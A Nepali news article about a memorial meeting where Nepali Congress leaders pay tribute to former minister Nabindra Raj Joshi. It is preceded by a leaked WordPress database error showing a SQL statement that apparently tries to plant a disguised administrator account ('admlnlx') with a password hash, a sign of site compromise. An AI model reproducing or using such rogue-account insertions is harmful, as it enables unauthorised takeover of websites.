WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByIRWqEXQhX8m/A6CHDIGOYi2xCu1n1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 06:45:07', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेपाली कांग्रेसका नेताहरूले पार्टीका केन्द्रीय सदस्य एवं पूर्वमन्त्री नवीन्द्रराज जोशीको निधनले कांग्रेस र देशलाई अपूरणीय क्षति पुगेको बताएका छन् । नेपाल विद्यार्थी सङ्घले नेता जोशीको १२ औँ पुण्य तिथिका अवसरमा मङ्गलबार यहाँ आयोजना गरेको श्रद्धाञ्जलि सभामा नेताहरुले स्वर्गीय जोशीमा निष्ठा, निरन्तरता र इमान्दारी भएको बताएका हुन् ।
कार्यक्रममा कांग्रेसका महामन्त्री पूर्णबहादुर खड्काले स्वर्गीय जोशीको राजनीतिलाई दुई पाटोबाट हेर्नुपर्ने बताए । “नेता जोशीलाई विसं २०४६ सालको जनआन्दोलन पहिले र जनआन्दोलन पछाडि गरी दुई पाटोबाट अध्ययन गर्नुपर्छ”, खड्काले भने । पार्टीभित्रको विवाद समाधानमा सदैव लाग्ने नेता जोशी सबैको प्यारो नेता भएको खडेकाको भनाइ थियो ।
कांग्रेस केन्द्रीय सदस्य एवं पूर्वमन्त्री बलबहादुर केसीले स्वर्गीय जोशी विद्यार्थी आन्दोलनको अगुवा नेता भएको बताए । “जोशीको निधनले देश र कांग्रेसले एक असल नेता गुमायो”, केसीले भने । राजनीति गर्ने व्यक्तिले नवीन्द्रराजबाट पाठ सिक्नुपर्ने केसिको भनाइ थियो ।
कांग्रेस केन्द्रीय सदस्य एवं पूर्वमन्त्री बालकृष्ण खाँणले जोशीको निधनले नेविसङ्घ र कांग्रेसलाई अतुलनीय क्षति पुगेको बताए। आँखामा राख्दा नबिझाउने नेता स्व जोशी भएको खाणको भनाइ थियो । कांग्रेस केन्द्रीय सदस्य एवं पूर्वमन्त्री दीपक गिरीले स्व जोशी अत्यन्त चतुर र शालीन नेता भएको बताए । कांग्रेसको सङ्गठन विस्तारमा जोशीको महत्वपूर्ण योगदान रहेको गिरिको भनाइ थियो ।
कांग्रेस केन्द्रीय सदस्य एवं पूर्वमन्त्री कमला पन्तले स्व जोशीले दुःखका बेला राजनीति गरेको बताए। नेता जोशी नेपाली राजनीतिको प्रेरणाको स्रोत भएको पन्तले बताए। कांग्रेस केन्द्रीय सदस्य एवं नेविसङ्घका पूर्व अध्यक्ष प्रदीप पौडेलले स्व जोशीको विचार र आदर्शले आफूलाई राजनीतिमा आउन प्रेरणा मिलेको बताउनुभयो । नेविसङ्घका अध्यक्ष राजीव ढुङगाना, महामन्त्री दीपक भट्टराईलगायतले कांग्रेस र नेविसङ्घलाई बलियो बनाएमात्र नेता जोशीप्रति सच्चा श्रद्धाञ्जलि हुने बताएको थियो । रासस